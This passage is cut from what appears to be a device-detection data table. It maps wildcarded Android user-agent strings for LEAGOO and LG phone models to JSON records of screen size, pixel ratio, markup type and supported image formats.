Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LEAGOO Lead6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LEAGOO Lead7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LENNY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D100AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D105) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D107) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D120AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D160) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D170) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D221) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D227) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D280) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D280/V10e) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D285) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D290) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D295) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D315) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D320AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D325) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D331) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D331/D33110f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D335) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D335E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D337) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D373) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D375AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D380) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D385) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D390) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D390AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D390n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D393) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D405) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D410) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D610AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D618) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D625) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D680) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D681) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D682) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D686) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D686) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D690) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D690n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D693) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D693AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D693n) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D722) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D722-Orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D722AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D722J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D724) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D802) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D802TR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D805) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D838) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D851) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D855) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D858HK) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D950) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D950G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D951) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D955) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D956) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D958) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-D959) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E410f) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E410g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E410g) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E410i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E410i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E411g) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E415f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E415f) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E415g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 